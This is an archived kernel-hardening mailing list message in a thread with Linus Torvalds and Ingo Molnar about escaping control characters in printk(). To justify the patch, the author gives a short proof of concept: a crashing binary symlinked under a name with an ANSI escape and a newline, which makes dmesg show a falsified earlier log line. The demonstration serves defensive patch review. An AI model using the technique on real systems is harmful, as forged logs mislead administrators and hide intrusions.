From: Vasiliy Kulikov <segoon@openwall.com>
To: kernel-hardening@lists.openwall.com
Cc: Linus Torvalds <torvalds@linux-foundation.org>,
Alan Cox <alan@lxorguk.ukuu.org.uk>,
Andrew Morton <akpm@linux-foundation.org>,
James Morris <jmorris@namei.org>,
Namhyung Kim <namhyung@gmail.com>,
Greg Kroah-Hartman <gregkh@suse.de>,
linux-kernel@vger.kernel.org
Subject: Re: [kernel-hardening] Re: [PATCH v2] kernel: escape non-ASCII and control characters in printk()
Date: Fri, 1 Jul 2011 16:54:11 +0400 [thread overview]
Message-ID: <20110701125411.GA21551@albatros> (raw)
In-Reply-To: <20110701120059.GL20990@elte.hu>
On Fri, Jul 01, 2011 at 14:00 +0200, Ingo Molnar wrote:
>
> * Linus Torvalds <torvalds@linux-foundation.org> wrote:
>
> > On Mon, Jun 27, 2011 at 11:38 AM, Vasiliy Kulikov <segoon@openwall.com> wrote:
> > >
> > > Sure, I don't propose it anymore (v2 goes without it).
> >
> > What point would you like to filter things at?
> >
> > I really think that user space should do its own filtering - nobody
> > does a plain 'cat' on dmesg. Or if they do, they really have
> > themselves to blame.
Some people do "dmesg | tail" or "grep -i err /var/log/messages". Or
even "tail -f /var/log/messages".
http://www.google.com/search?q=grep+var+log+messages
> > And afaik, we don't do any escape sequence handling at the console
> > level either, so you cannot mess up the console with control
> > characters.
> >
> > And the most dangerous character seems to be one that you don't
> > filter: the one we really do react to is '\n', and you could possibly
> > make confusing log messages by embedding a newline in your string and
> > then trying to make the rest look like something bad (say, an oops).
> >
> > So I'm not entirely convinced about this filtering at all.
>
> Yeah. It would be nice to see a demonstration of at least one 'bad
> thing' that is possible via the current code, before we protect
> against it.
>
> The claim the patch makes is rather specific:
>
> | There are numerous printk() instances with user supplied input as
> | "%s" data, and unprivileged user may craft log messages with
> | substrings containing control characters via these printk()s.
> | Control characters might fool root viewing the logs via tty, e.g.
> | using ^[1A to suppress the previous log line.
>
> So it ought to be demonstrable.
Read this mail again:
http://www.openwall.com/lists/kernel-hardening/2011/06/22/6
Using the instance of the bug in core dump code that Willy used here for
\n thing:
http://www.openwall.com/lists/kernel-hardening/2011/06/25/3
We get:
$ echo "main() { sprintf((char*)3, (char*)1); }" | gcc -xc -o ../1234 -
$ ln -s ../1234 $'\x1b[1Ainit\nfail'
Now generate an arbitrary log message:
$ ../1234
Ошибка сегментирования (core dumped)
$ dmesg | tail -n1
[16291.982492] 1234[21579]: segfault at 0 ip 00007f527186028a sp 00007fff08251dd8 error 4 in libc-2.11.1.so[7f52717d8000+17a000]
Change this log entry:
$ './^[[1Ainit
fail'
Ошибка сегментирования (core dumped)
$ dmesg | tail
...
[16291.982492] init[21579]: segfault at 0 ip 00007f527186028a sp 00007fff08251dd8 error 4 in libc-2.11.1.so[7f52717d8000+17a000]
[16379.001357] fail[21586]: segfault at 0 ip 00007f332831028a sp 00007fffc52de568 error 4 in libc-2.11.1.so[7f3328288000+17a000]
$
(see 1234 => init change)
As you see here, the previous log entry was showed not as it was
initally logged. Core dump message was chosen fully arbitrary, just to
show that some specific part of it can be "edited".
If this step-by-step instruction is not a proof, then I don't know what
the word "proof" means...
--
Vasiliy Kulikov
http://www.openwall.com - bringing security into open computing environments
next prev parent reply other threads:[~2011-07-01 12:54 UTC|newest]
Thread overview: 31+ messages / expand[flat|nested] mbox.gz Atom feed top
2011-06-23 15:21 [kernel-hardening] [PATCH v2] kernel: escape non-ASCII and control characters in printk() Vasiliy Kulikov
2011-06-26 10:39 ` [kernel-hardening] " Ingo Molnar
2011-06-26 16:54 ` Vasiliy Kulikov
2011-06-26 18:26 ` Ingo Molnar
2011-06-26 19:06 ` Vasiliy Kulikov
2011-06-26 19:46 ` Ingo Molnar
2011-06-26 20:25 ` Vasiliy Kulikov
2011-06-26 22:01 ` Ingo Molnar
2011-06-27 8:36 ` Vasiliy Kulikov
2011-06-27 9:20 ` Vasiliy Kulikov
2011-06-27 9:40 ` Alan Cox
2011-06-27 18:38 ` Vasiliy Kulikov
2011-06-28 19:30 ` Linus Torvalds
2011-07-01 12:00 ` Ingo Molnar
2011-07-01 12:54 ` Vasiliy Kulikov [this message]
2011-07-01 14:20 ` Alan Cox
2011-07-02 16:42 ` Solar Designer
2011-07-02 19:33 ` Alan Cox
2011-07-02 20:34 ` Linus Torvalds
2011-07-01 14:37 ` Vasiliy Kulikov
2011-07-01 14:49 ` Alan Cox
2011-07-02 8:10 ` Vasiliy Kulikov
2011-07-02 15:08 ` Greg KH
2011-07-03 10:01 ` Vasiliy Kulikov
2011-07-03 11:42 ` Vasiliy Kulikov
2011-07-03 12:23 ` Alan Cox
2011-07-03 17:42 ` Linus Torvalds
2011-07-03 21:10 ` Alan Cox
2011-07-03 21:34 ` Linus Torvalds
2011-07-05 17:49 ` Vasiliy Kulikov
2011-07-01 12:12 ` Ingo Molnar
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20110701125411.GA21551@albatros \
--to=segoon@openwall.com \
--cc=akpm@linux-foundation.org \
--cc=alan@lxorguk.ukuu.org.uk \
--cc=gregkh@suse.de \
--cc=jmorris@namei.org \
--cc=kernel-hardening@lists.openwall.com \
--cc=linux-kernel@vger.kernel.org \
--cc=namhyung@gmail.com \
--cc=torvalds@linux-foundation.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox